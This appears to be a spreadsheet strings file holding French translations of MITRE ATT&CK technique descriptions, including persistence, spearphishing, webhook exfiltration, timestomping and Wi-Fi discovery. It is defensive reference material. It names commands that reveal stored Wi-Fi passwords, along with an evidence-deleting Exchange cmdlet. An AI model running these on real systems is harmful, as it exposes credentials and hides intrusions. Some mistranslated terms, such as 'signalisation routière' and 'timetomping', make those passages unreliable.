    <t>Les adversaires peuvent fouiller des systèmes compromis pour trouver et obtenir des informations d’identification stockées de manière non sécurisée. Ces informations d’identification peuvent être stockées et/ou égarées à de nombreux endroits d’un système, y compris des fichiers en texte brut (par exemple, [Bash History](https://attack.mitre.org/techniques/T1552/003)), des référentiels spécifiques au système d’exploitation ou à une application (par exemple, [Informations d’identification dans le registre](https://attack.mitre.org/techniques/T1552/002)), ou d’autres fichiers/artefacts spécialisés (par exemple, [Clés privées](https://attack.mitre.org/techniques/T1552/004)). (Citation : Brining MimiKatz à Unix)
https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des moniteurs de port pour exécuter une DLL fournie par l’adversaire lors du démarrage du système à des fins de persistance ou d’élévation de privilèges. Un moniteur de port peut être configuré via l’appel d’API &lt;code&gt;AddMonitor&lt;/code&gt; pour définir une DLL à charger au démarrage. (Citation : AddMonitor) Cette DLL peut se trouver dans &lt;code&gt;C :\Windows\System32&lt;/code&gt; et sera chargée et exécutée par le service de spouleur d’impression, 'spoolsv.exe', sous les permissions de niveau SYSTÈME au démarrage. (Référence : Bloxham) 
Une DLL arbitraire peut également être chargée si les autorisations permettent d’écrire un chemin d’accès complet pour cette DLL dans la valeur « Driver » d’une sous-clé existante ou nouvelle nommée arbitrairement de &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. La clé de registre contient les entrées suivantes :
* Port local
* Port TCP/IP standard
* Moniteur USB
* Port WSD
https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le courrier et les données de l’application de courrier pour supprimer les preuves de leur activité. Les applications de messagerie permettent aux utilisateurs et à d’autres programmes d’exporter et de supprimer des données de boîte aux lettres via des outils de ligne de commande ou à l’aide d’API. Les données de l’application de messagerie peuvent être des e-mails, des métadonnées d’e-mail ou des journaux générés par l’application ou le système d’exploitation, tels que des demandes d’exportation. 
Les adversaires peuvent manipuler les e-mails et les données de la boîte aux lettres pour supprimer les journaux, les artefacts et les métadonnées, tels que les preuves d'[hameçonnage](https://attack.mitre.org/techniques/T1566)/[spearphishing interne](https://attack.mitre.org/techniques/T1534), [Collecte d’e-mails](https://attack.mitre.org/techniques/T1114), [Protocoles de messagerie](https://attack.mitre.org/techniques/T1071/003) pour la commande et le contrôle, ou l’exfiltration basée sur des e-mails tels que [Exfiltration sur une alternative Protocole](https://attack.mitre.org/techniques/T1048). Par exemple, pour supprimer des preuves sur les serveurs Exchange, les adversaires ont utilisé le module &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001), y compris &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; pour supprimer les preuves d’exportations de boîtes aux lettres. (Citation : Volexity SolarWinds)(Citation : Module ExchangePowerShell) Sous Linux et macOS, les adversaires peuvent également supprimer des e-mails via un utilitaire de ligne de commande appelé &lt;code&gt;mail&lt;/code&gt; ou utiliser [AppleScript](https://attack.mitre.org/techniques/T1059/002) pour interagir avec les API sur macOS. (Citation : Cybereason Cobalt Kitty 2017)(Citation : page de manuel mailx)
Les adversaires peuvent également supprimer les e-mails et les métadonnées/en-têtes indiquant un spam ou une activité suspecte (par exemple, en utilisant des règles de transport à l’échelle de l’organisation) afin de réduire la probabilité que les e-mails malveillants soient détectés par les produits de sécurité. (Citation : Microsoft OAuth Spam 2022)
https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un hook de connexion pour établir la persistance exécutée lors de la connexion de l’utilisateur. Un hook de connexion est un fichier plist qui pointe vers un script spécifique à exécuter avec les privilèges root lors de la connexion de l’utilisateur. Le fichier plist se trouve dans le fichier &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; et peut être modifié à l’aide &lt;code&gt;de l’utilitaire de ligne de commande defaults&lt;/code&gt;. Ce comportement est le même pour les hooks de déconnexion où un script peut être exécuté lors de la déconnexion de l’utilisateur. Tous les hooks nécessitent des autorisations d’administrateur pour modifier ou créer des hooks. (Citation : Scripts de connexion Apple Dev)(Citation : LoginWindowScripts Apple Dev) 
Les adversaires peuvent ajouter ou insérer un chemin d’accès à un script malveillant dans le fichier &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt;, à l’aide de la paire clé-valeur &lt;code&gt;LoginHook&lt;/code&gt; ou &lt;code&gt;LogoutHook&lt;/code&gt;. Le script malveillant est exécuté lors de la prochaine connexion de l’utilisateur. Si un hook de connexion existe déjà, les adversaires peuvent ajouter des commandes supplémentaires à un hook de connexion existant. Il ne peut y avoir qu’un seul hook de connexion et de déconnexion sur un système à la fois. (Citation : S1 macOs Persistence)(Citation : chapitre sur la persistance de Wardle)
Les hooks de connexion ont été dépréciés dans la version 10.11 de macOS en faveur de [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux victimes et communiquer en permanence avec elles en injectant du contenu malveillant dans les systèmes par le biais du trafic réseau en ligne. Plutôt que d’attirer les victimes vers des charges utiles malveillantes hébergées sur un site Web compromis (c’est-à-dire [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) suivi de [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), les adversaires peuvent d’abord accéder aux victimes par le biais de canaux de transfert de données compromis où ils peuvent manipuler le trafic et/ou injecter leur propre contenu. Ces canaux de réseau en ligne compromis peuvent également être utilisés pour fournir des charges utiles supplémentaires (c’est-à-dire [Transfert d’outil d’entrée][https://attack.mitre.org/techniques/T1105)) et d’autres données à des systèmes déjà compromis. (Citation : ESET MoustachedBouncer)
Les adversaires peuvent injecter du contenu dans les systèmes victimes de différentes manières, notamment :
* À partir du milieu, où l’adversaire se trouve entre des communications client-serveur en ligne légitimes (**Remarque :** ceci est similaire mais distinct de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), qui décrit l’activité AiTM uniquement dans un environnement d’entreprise) (Citation : Kaspersky Encyclopedia MiTM)
* De côté, où le contenu malveillant est injecté et se précipite vers le client en tant que fausse réponse aux demandes d’un serveur en ligne légitime (Citation : Kaspersky ManOnTheSide)
L’injection de contenu est souvent le résultat de canaux de communication en amont compromis, par exemple au niveau d’un fournisseur d’accès à Internet (FAI), comme c’est le cas pour « l’interception légale ». (Citation : Kaspersky ManOnTheSide)(Citation : ESET MoustachedBouncer)(Citation : Attaque GitHub de l’EFF en Chine)
https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code dans les processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection de processus est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection de processus peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime. 
Il existe de nombreuses façons d’injecter du code dans un processus, dont beaucoup abusent de fonctionnalités légitimes. Ces implémentations existent pour tous les principaux systèmes d’exploitation, mais sont généralement spécifiques à la plate-forme. 
Des échantillons plus sophistiqués peuvent effectuer plusieurs injections de processus pour segmenter les modules et échapper davantage à la détection, en utilisant des tuyaux nommés ou d’autres mécanismes de communication inter-processus (IPC) comme canal de communication.
https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>"Des adversaires peuvent envoyer des courriels de spearphishing avec un lien malveillant pour tenter d'accéder aux systèmes des victimes. Le spearphishing avec lien est une variante spécifique du spearphishing. Elle se distingue des autres formes de spearphishing par l'utilisation de liens pour télécharger des logiciels malveillants contenus dans le courrier électronique, au lieu de joindre des fichiers malveillants au courrier électronique lui-même, afin d'éviter les défenses qui peuvent inspecter les pièces jointes des courriers électroniques. Le spearphishing peut également faire appel à des techniques d'ingénierie sociale, par exemple en se faisant passer pour une source fiable.
Toutes les formes de spearphishing sont des techniques d'ingénierie sociale diffusées par voie électronique et visant une personne, une entreprise ou un secteur d'activité spécifique. Dans ce cas, les courriels malveillants contiennent des liens. Généralement, les liens sont accompagnés d'un texte d'ingénierie sociale et demandent à l'utilisateur de cliquer activement ou de copier-coller une URL dans un navigateur, en tirant parti de l'[Exécution par l'utilisateur] (https://attack.mitre.org/techniques/T1204). Le site web visité peut compromettre le navigateur web à l'aide d'un exploit, ou l'utilisateur sera invité à télécharger des applications, des documents, des fichiers zip, voire des exécutables, en fonction du prétexte de l'envoi du courrier électronique.
Les adversaires peuvent également inclure des liens destinés à interagir directement avec un lecteur de courrier électronique, y compris des images intégrées destinées à exploiter directement le système final. En outre, les adversaires peuvent utiliser des liens apparemment inoffensifs qui abusent de caractères spéciaux pour imiter des sites web légitimes (ce que l'on appelle une « attaque par homographe IDN »). (Citation : CISA IDN ST05-016) Les URL peuvent également être obscurcies en tirant parti de bizarreries dans le schéma URL, telles que l'acceptation de formats de noms d'hôtes basés sur des nombres entiers ou hexadécimaux et le rejet automatique du texte précédant le symbole « @ » : par exemple, `hxxp://google.com@1157586937`. (Citation : Mandiant URL Obfuscation 2023)
Les adversaires peuvent également utiliser des liens pour effectuer du phishing de consentement, généralement avec des URL de demande OAuth 2.0 qui, lorsqu'elles sont acceptées par l'utilisateur, fournissent des autorisations/accès à des applications malveillantes, permettant aux adversaires de [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation : Trend Micro Pawn Storm OAuth 2017) Ces jetons d'accès volés permettent à l'adversaire d'effectuer diverses actions au nom de l'utilisateur par le biais d'appels API. (Citation : Microsoft OAuth 2.0 Consent Phishing 2021)
Les adversaires peuvent également utiliser des liens de spearphishing pour [Steal Application Access Token] (https://attack.mitre.org/techniques/T1528) qui donnent un accès immédiat à l'environnement de la victime. Par exemple, un utilisateur peut être incité, par le biais d'un « phishing de consentement », à accorder à des adversaires des autorisations/accès via une URL de demande OAuth 2.0 malveillante (Citation : Trend Micro Pawn Storm OAuth 2017) (Citation : Microsoft OAuth 2.0 Consent Phishing 2021).
De même, les liens malveillants peuvent également cibler l'autorisation basée sur l'appareil, comme le flux d'autorisation d'appareil OAuth 2.0 qui est généralement utilisé pour authentifier les appareils sans interface utilisateur/navigateur. Connu sous le nom de "phishing du code de l'appareil", un adversaire peut envoyer un lien qui dirige la victime vers une page d'autorisation malveillante où l'utilisateur est incité à saisir un code/des informations d'identification qui produisent un jeton d'appareil.(Citation : SecureWorks Device Code Phishing 2021)(Citation : Netskope Device Code Phishing 2021)(Citation : Optiv Device Code Phishing 2021)
https://attack.mitre.org/techniques/T1566/002"</t>
  </si>
  <si>
    <t>"Les adversaires peuvent envoyer des messages de spearphishing avec un lien malveillant pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative de tromper les cibles pour qu'elles divulguent des informations, souvent des informations d'identification ou d'autres informations exploitables. Le spearphishing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de multiples messages apparemment urgents.
Toutes les formes de spearphishing sont des techniques d'ingénierie sociale diffusées par voie électronique et ciblées sur une personne, une entreprise ou un secteur d'activité spécifique. Dans ce scénario, les courriels malveillants contiennent des liens généralement accompagnés d'un texte d'ingénierie sociale visant à inciter l'utilisateur à cliquer activement ou à copier et coller une URL dans un navigateur. (Citation : TrendMictro Phishing) (Citation : PCMag FakeLogin) Le site web donné peut être un clone d'un site légitime (tel qu'un portail de connexion en ligne ou d'entreprise) ou peut ressembler étroitement à un site légitime en apparence et avoir une URL contenant des éléments du site réel. Les URL peuvent également être obscurcies en tirant parti de bizarreries dans le schéma URL, telles que l'acceptation de formats de noms d'hôtes basés sur des nombres entiers ou hexadécimaux et l'élimination automatique du texte précédant le symbole « @ » : par exemple, `hxxp://google.com@1157586937`.(Citation : Mandiant URL Obfuscation 2023)
Les adversaires peuvent également intégrer des « pixels de suivi », des « web bugs » ou des « web beacons » dans les messages d'hameçonnage pour vérifier la réception d'un courriel, tout en établissant potentiellement un profil et en suivant les informations de la victime telles que l'adresse IP (Citation : NIST Web Bug) (Citation : Ryte Wiki) Ces mécanismes apparaissent souvent sous la forme de petites images (généralement d'une taille d'un pixel) ou d'autres objets obscurcis et sont généralement livrés sous forme de code HTML contenant un lien vers un serveur distant (Citation : Ryte Wiki). (Citation : Ryte Wiki)(Citation : IAPP)
Les adversaires peuvent également être en mesure d'usurper un site web complet en utilisant ce qui est connu sous le nom d'attaque « browser-in-the-browser » (BitB). En générant une fausse fenêtre contextuelle de navigateur avec une barre d'adresse HTML qui semble contenir une URL légitime (comme un portail d'authentification), ils peuvent être en mesure d'inviter les utilisateurs à saisir leurs informations d'identification tout en contournant les méthodes habituelles de vérification des URL.(Citation : ZScaler BitB 2020)(Citation : Mr. D0x BitB 2022)
Les adversaires peuvent utiliser des kits d'hameçonnage tels que `EvilProxy` et `Evilginx2` pour effectuer un hameçonnage de type adversary-in-the-middle (adversaire au milieu) en établissant une connexion entre la victime et le site web légitime. Lors d'une connexion réussie, la victime est redirigée vers le site web légitime, tandis que l'adversaire capture son cookie de session (c'est-à-dire [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) en plus de son nom d'utilisateur et de son mot de passe. Cela peut permettre à l'adversaire de contourner le MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004). (Citation : Proofpoint Human Factor)
Les adversaires peuvent également envoyer un lien malveillant sous la forme d'un code de réponse rapide (QR) (également connu sous le nom de « quishing »). Ces liens peuvent diriger la victime vers une page d'hameçonnage d'informations d'identification (Citation : QR-campaign-energy-firm). En utilisant un code QR, l'URL peut ne pas être exposée dans l'e-mail et peut donc ne pas être détectée par la plupart des analyses automatiques de sécurité des e-mails (Citation : qr-phish-agriculture). Ces codes QR peuvent être scannés par l'appareil mobile de l'utilisateur ou lui être envoyés directement (c'est-à-dire, [Phishing] (https://attack.mitre.org/techniques/T1660)), ce qui peut être moins sûr à plusieurs égards. (Citation : qr-phish-agriculture) Par exemple, les utilisateurs mobiles peuvent ne pas être en mesure de remarquer les différences mineures entre les sites Web authentiques et les sites Web de collecte d'informations d'identification en raison du facteur de forme plus petit du téléphone portable.
Sur le faux site web, les informations sont recueillies dans des formulaires web et envoyées à l'adversaire. Les adversaires peuvent également utiliser des informations provenant d'efforts de reconnaissance antérieurs (par exemple : [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) ou [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) pour créer des leurres persuasifs et crédibles.
https://attack.mitre.org/techniques/T1598/003"</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers un point de terminaison de webhook plutôt que sur leur canal de commande et de contrôle principal. Les webhooks sont des mécanismes simples permettant à un serveur de pousser des données via HTTP/S vers un client sans que le client ait besoin d’interroger continuellement le serveur. (Citation : Webhooks RedHat) De nombreux services publics et commerciaux, tels que Discord, Slack et « webhook.site », prennent en charge la création de points de terminaison de webhook qui peuvent être utilisés par d’autres services, tels que Github, Jira ou Trello. (Citation : Discord Intro to Webhooks) Lorsque des modifications se produisent dans les services liés (par exemple, l’envoi d’une mise à jour du référentiel ou la modification d’un ticket), ces services publient automatiquement les données sur le point de terminaison du webhook pour être utilisées par l’application consommane. 
Les adversaires peuvent lier un environnement appartenant à l’adversaire à un service SaaS appartenant à la victime pour réaliser une [exfiltration automatisée](https://attack.mitre.org/techniques/T1020) répétée d’e-mails, de messages de chat et d’autres données. (citation : Webhooks du référentiel d’attaques SaaS de sécurité push) Alternativement, au lieu de lier le point de terminaison du webhook à un service, un adversaire peut publier manuellement des données préparées directement sur l’URL afin de les exfiltrer. (Citation : Microsoft SQL Server)
L’accès aux points de terminaison de webhook se fait souvent via HTTPS, ce qui donne à l’adversaire un niveau de protection supplémentaire. L’exfiltration utilisant des webhooks peut également se fondre dans le trafic réseau normal si le point de terminaison du webhook pointe vers une application SaaS ou un service de collaboration couramment utilisé. (Citation : CyberArk Labs Discord)(Citation : Abus de webhook Talos Discord)(Citation : Webhooks de Checkmarx)
https://attack.mitre.org/techniques/T1567/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser la signalisation routière pour masquer des ports ouverts ou d’autres fonctionnalités malveillantes utilisées pour la persistance ou la commande et le contrôle. La signalisation routière implique l’utilisation d’une valeur magique ou d’une séquence qui doit être envoyée à un système pour déclencher une réponse spéciale, telle que l’ouverture d’un port fermé ou l’exécution d’une tâche malveillante. Cela peut prendre la forme de l’envoi d’une série de paquets présentant certaines caractéristiques avant l’ouverture d’un port que l’adversaire peut utiliser pour la commande et le contrôle. Habituellement, cette série de paquets consiste en des tentatives de connexion à une séquence prédéfinie de ports fermés (c’est-à-dire [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), mais peut impliquer des drapeaux inhabituels, des chaînes spécifiques ou d’autres caractéristiques uniques. Une fois la séquence terminée, l’ouverture d’un port peut être effectuée par le pare-feu basé sur l’hôte, mais peut également être mise en œuvre par un logiciel personnalisé.
Les adversaires peuvent également communiquer avec un port déjà ouvert, mais le service qui écoute sur ce port ne répondra aux commandes ou ne déclenchera d’autres fonctionnalités malveillantes que si la ou les valeurs magiques appropriées sont passées.
L’observation des paquets de signaux pour déclencher la communication peut être effectuée par différentes méthodes. Un moyen, mis en œuvre à l’origine par Cd00r (Citation : Hartrell cd00r 2002), est d’utiliser les bibliothèques libpcap pour renifler les paquets en question. Une autre méthode exploite les sockets bruts, ce qui permet au logiciel malveillant d’utiliser des ports déjà ouverts pour être utilisés par d’autres programmes.
Sur les périphériques réseau, les adversaires peuvent utiliser des paquets contrefaits pour activer [l’authentification des périphériques réseau](https://attack.mitre.org/techniques/T1556/004) pour les services standard proposés par le périphérique, tels que telnet.  Une telle signalisation peut également être utilisée pour ouvrir un port de service fermé tel que telnet, ou pour déclencher la modification de module d’implants de logiciels malveillants sur l’appareil, en ajoutant, supprimant ou modifiant des capacités malveillantes.  Les adversaires peuvent utiliser des paquets contrefaits pour tenter de se connecter à un ou plusieurs ports (ouverts ou fermés), mais peuvent également tenter de se connecter à une interface de routeur, à une diffusion et à une adresse IP réseau sur le même port afin d’atteindre leurs buts et objectifs. (Citation : Cisco Synful Knock Evolution)(Citation : Mandiant - Synful Knock)(Citation : Blog Cisco Legacy Device Attacks)  Pour activer cette signalisation de trafic sur les périphériques intégrés, les adversaires doivent d’abord réaliser et exploiter [Patch System Image](https://attack.mitre.org/techniques/T1601/001) en raison de la nature monolithique de l’architecture.
Les adversaires peuvent également utiliser la fonction Wake-on-LAN pour allumer les systèmes hors tension. Wake-on-LAN est une fonctionnalité matérielle qui permet à un système hors tension d’être mis sous tension, ou réveillé, en lui envoyant un paquet magique. Une fois le système sous tension, il peut devenir une cible pour les mouvements latéraux. (Citation : Ordinateur Bleeping - Ryuk WoL)(Citation : AMD Magic Packet)
https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les [comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter directement à une infrastructure de calcul hébergée dans le cloud accessible via des méthodes natives du cloud. De nombreux fournisseurs de cloud proposent des connexions interactives à l’infrastructure virtuelle accessible via l'[API cloud](https://attack.mitre.org/techniques/T1059/009), telle que Azure Serial Console (Référence : Azure Serial Console), AWS EC2 Instance Connect (Référence : EC2 Instance Connect) (Référence : lucr-3 : Obtention de SaaS-y dans le cloud) et AWS System Manager. (Citation : AWS System Manager).
Les méthodes d’authentification de ces connexions peuvent inclure des mots de passe, des jetons d’accès à l’application ou des clés SSH. Ces méthodes cloud natives peuvent, par défaut, autoriser un accès privilégié sur l’hôte avec un accès SYSTEM ou de niveau racine. 
Les adversaires peuvent utiliser ces méthodes cloud natives pour accéder directement à l’infrastructure virtuelle et pivoter dans un environnement. (Citation : Échange de carte SIM et abus de la console série Microsoft Azure) Ces connexions fournissent généralement un accès direct à la console virtuelle plutôt que l’exécution de scripts (c’est-à-dire [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).
https://attack.mitre.org/techniques/T1021/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les défenses basées sur le processus et/ou les signatures en mandatant l’exécution de contenu malveillant avec des binaires signés ou de confiance. Les fichiers binaires utilisés dans cette technique sont souvent des fichiers signés par Microsoft, ce qui indique qu’ils ont été téléchargés à partir de Microsoft ou qu’ils sont déjà natifs dans le système d’exploitation. (Citation : Projet LOLBAS) Les fichiers binaires signés avec des certificats numériques approuvés peuvent généralement s’exécuter sur des systèmes Windows protégés par la validation de signature numérique. Plusieurs fichiers binaires signés par Microsoft qui sont par défaut sur les installations Windows peuvent être utilisés pour l’exécution proxy d’autres fichiers ou commandes.
De même, sur les systèmes Linux, les adversaires peuvent abuser de fichiers binaires de &lt;code&gt;confiance, tels&lt;/code&gt; que l’exécution de commandes malveillantes. (Citation : page de manuel divisée)(Citation : s’en aller divisé)
https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les attributs de temps de fichier pour masquer de nouveaux fichiers ou des modifications apportées à des fichiers existants. Le timetomping est une technique qui modifie les horodatages d’un fichier (modifier, accéder, créer et changer les heures), souvent pour imiter les fichiers qui se trouvent dans le même dossier et mélanger des fichiers malveillants avec des fichiers légitimes.
Les attributs '$STANDARD_INFORMATION' ('$SI') et '$FILE_NAME' ('$FN') attribuent les temps d’enregistrement dans un fichier MFT (Master File Table). (Citation : Inversecos Timestomping 2022) '$SI' (dates/horodatages) est affiché à l’utilisateur final, y compris dans la vue du système de fichiers, tandis que '$FN' est traité par le noyau. (Citation : Magnet Forensics)
La modification de l’attribut '$SI' est la méthode la plus courante de timetomping, car elle peut être modifiée au niveau de l’utilisateur à l’aide d’appels API. Cependant, le timetomping '$FN nécessite généralement d’interagir avec le noyau du système ou de déplacer ou de renommer un fichier. (Citation : Inversecos Timestomping 2022)
Les adversaires modifient les horodatages des fichiers afin qu’ils n’apparaissent pas visibles aux enquêteurs ou aux outils d’analyse de fichiers. Afin d’éviter les détections qui reposent sur l’identification des écarts entre les attributs « $SI » et « $FN », les adversaires peuvent également se livrer à un « double timetomping » en modifiant les temps sur les deux attributs simultanément. (Citation : Double Timetomping)
Timestomping peut être utilisé avec le nom de fichier [Masquerading](https://attack.mitre.org/techniques/T1036) pour masquer les logiciels malveillants et les outils. (Citation : Techniques anti-criminalistiques WindowsIR)
https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent héberger des points d’accès Wi-Fi apparemment authentiques pour inciter les utilisateurs à se connecter à des réseaux malveillants afin de soutenir des comportements ultérieurs tels que [Reniflage de réseau](https://attack.mitre.org/techniques/T1040), [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002) ou [Capture d’entrée](https://attack.mitre.org/techniques/T1056). (Citation : Australie 'Evil Twin')
En utilisant un SSID (Service Set Identifier) d’un réseau Wi-Fi légitime, les points d’accès Wi-Fi frauduleux peuvent inciter les appareils ou les utilisateurs à se connecter à des réseaux Wi-Fi malveillants. (Citation : Jumeau maléfique de Kaspersky)(Citation : jumeau moyen-maléfique)  Les adversaires peuvent fournir un signal plus puissant ou bloquer l’accès aux points d’accès Wi-Fi pour contraindre ou inciter les appareils victimes à se connecter à des réseaux malveillants. (Citation : spectre ops jumeau maléfique)  Un Wi-Fi Pineapple – un outil d’audit de sécurité réseau et de test d’intrusion – peut être déployé dans les attaques Evil Twin pour une facilité d’utilisation et une portée plus large. Des certificats personnalisés peuvent être utilisés pour tenter d’intercepter le trafic HTTPS. 
De même, les adversaires peuvent également écouter les appareils clients qui envoient des demandes de sonde pour des réseaux connus ou précédemment connectés (listes de réseaux préférés ou PNL). Lorsqu’un point d’accès malveillant reçoit une demande de sonde, les adversaires peuvent répondre avec le même SSID pour imiter le réseau de confiance et connu. (Citation : spectre ops jumeau maléfique)  Les appareils victimes sont amenés à croire que le point d’accès répondant provient de leur PNL et initient une connexion au réseau frauduleux.
Lorsqu’il se connecte au point d’accès Wi-Fi malveillant, un utilisateur peut être redirigé vers une fausse page de connexion ou une page Web de portail captif pour capturer les informations d’identification de la victime. Une fois qu’un utilisateur est connecté au réseau Wi-Fi frauduleux, l’adversaire peut être en mesure de surveiller l’activité du réseau, de manipuler des données ou de voler des informations d’identification supplémentaires. Les endroits où les concentrations d’accès Wi-Fi public sont élevées, tels que les aéroports, les cafés ou les bibliothèques, peuvent être la cible d’adversaires qui cherchent à mettre en place des points d’accès Wi-Fi illégitimes.
https://attack.mitre.org/techniques/T1557/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent charger du code de manière réfléchie dans un processus afin de dissimuler l’exécution de charges utiles malveillantes. Le chargement réfléchi consiste à allouer puis à exécuter des charges utiles directement dans la mémoire du processus, au lieu de créer un thread ou un processus soutenu par un chemin de fichier sur le disque (par exemple, [Modules partagés](https://attack.mitre.org/techniques/T1129)).
Les charges utiles chargées de manière réfléchie peuvent être des binaires compilés, des fichiers anonymes (uniquement présents dans la RAM) ou simplement des snob de code exécutable sans fichier (ex : shellcode indépendant de la position). (Citation : Présentation du beignet)(Citation : S1 Custom Shellcode Tool)(Citation : Mémoire de Stuart ELF)(Citation : 00sec Droppers)(Citation : Mandiant BYOL) Par exemple, la méthode 'Assembly.Load()' exécutée par [PowerShell](https://attack.mitre.org/techniques/T1059/001) peut être utilisée de manière abusive pour charger du code brut dans le processus en cours d’exécution. (Citation : Microsoft AssemblyLoad)
L’injection de code réfléchissante est très similaire à l’injection de processus(https://attack.mitre.org/techniques/T1055), sauf que l’injection charge le code dans la mémoire des processus au lieu de celle d’un processus distinct. Le chargement réfléchi peut échapper aux détections basées sur le processus, car l’exécution du code arbitraire peut être masquée dans un processus légitime ou autrement bénin. Le chargement réfléchi des charges utiles directement en mémoire peut également éviter de créer des fichiers ou d’autres artefacts sur le disque, tout en permettant aux logiciels malveillants de conserver ces charges utiles chiffrées (ou obscurcies) jusqu’à l’exécution. (Citation : Mémoire de Stuart ELF)(Citation : 00sec Droppers)(Citation : Intezer ACBackdoor)(Citation : S1 Old Rat New Tricks)
https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des informations sur les réseaux Wi-Fi, telles que des noms et des mots de passe de réseau, sur des systèmes compromis. Les adversaires peuvent utiliser les informations Wi-Fi dans le cadre de [Découverte de compte](https://attack.mitre.org/techniques/T1087), [Découverte de système à distance](https://attack.mitre.org/techniques/T1018) et d’autres activités de découverte ou d'[Accès aux informations d’identification](https://attack.mitre.org/tactics/TA0006) pour soutenir les campagnes en cours et futures.
Les adversaires peuvent collecter divers types d’informations sur les réseaux Wi-Fi auprès des hôtes. Par exemple, sous Windows, les noms et mots de passe de tous les réseaux Wi-Fi auxquels un appareil s’est précédemment connecté peuvent être disponibles via « netsh wlan show profiles » pour énumérer les noms Wi-Fi, puis « netsh wlan show profile « Wi-Fi name » key=clear » pour afficher le mot de passe correspondant d’un réseau Wi-Fi. (Citation : BleepingComputer Agent Tesla vole des mots de passe wifi)(Citation : Malware Bytes New AgentLa variante Tesla vole les informations d’identification WiFi)(Citation : Check Point APT35 CharmPower janvier 2022) De plus, les noms et autres détails des réseaux Wi-Fi accessibles localement peuvent être découverts à l’aide d’appels aux fonctions « wlanAPI.dll » [API native](https://attack.mitre.org/techniques/T1106). (Citation : Binary Defense Emotes Wi-Fi Spreader)
Sous Linux, les noms et mots de passe de tous les réseaux Wi-Fi auxquels un appareil s’est précédemment connecté peuvent être disponibles dans des fichiers sous ' /etc/NetworkManager/system-connections/ ». (citation : Mot de passe Wi-Fi de tous les réseaux connectés sous Windows/Linux) Sur macOS, le mot de passe d’un Wi-Fi connu peut être identifié par ' security find-generic-password -wa wifiname' (nécessite un nom d’utilisateur/mot de passe admin). (Citation : Trouver un mot de passe Wi-Fi sur Mac)
https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent limiter l’exécution ou les actions en fonction de la présence d’un mutex associé à un logiciel malveillant. Un mutex est un mécanisme de verrouillage utilisé pour synchroniser l’accès à une ressource. Un seul thread ou processus peut acquérir un mutex à un moment donné. (Citation : Microsoft Mutexes)
Alors que les mutex locaux n’existent qu’au sein d’un processus donné, permettant à plusieurs threads de synchroniser l’accès à une ressource, les mutex système peuvent être utilisés pour synchroniser les activités de plusieurs processus. (Citation : Microsoft Mutexes) En créant un mutex système unique associé à un logiciel malveillant particulier, les adversaires peuvent vérifier si un système a déjà été compromis ou non. (Citation : Sans Mutexes 2012)
Dans les environnements Linux, les logiciels malveillants peuvent tenter d’acquérir un verrou sur un fichier mutex. Si le logiciel malveillant parvient à acquérir le verrou, il continue à s’exécuter ; S’il échoue, il se ferme pour éviter de créer une deuxième instance de lui-même. (Citation : Intezer RedXOR 2021)(Citation : Deep Instinct BPFDoor 2023)
Les noms muteux peuvent être codés en dur ou générés dynamiquement à l’aide d’un algorithme prévisible. (Citation : ICS Mutexes 2015)
https://attack.mitre.org/techniques/T1480/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes défensifs en exécutant des commandes qui se cachent des signaux d’interruption de processus. De nombreux systèmes d’exploitation utilisent des signaux pour transmettre des messages afin de contrôler le comportement du processus. Les interpréteurs de commandes incluent souvent des commandes/indicateurs spécifiques qui ignorent les erreurs et autres blocages, par exemple lorsque l’utilisateur de la session active se déconnecte. Ces signaux d’interruption peuvent également être utilisés par des outils défensifs et/ou des analystes pour suspendre ou terminer des processus en cours d’exécution spécifiés. 
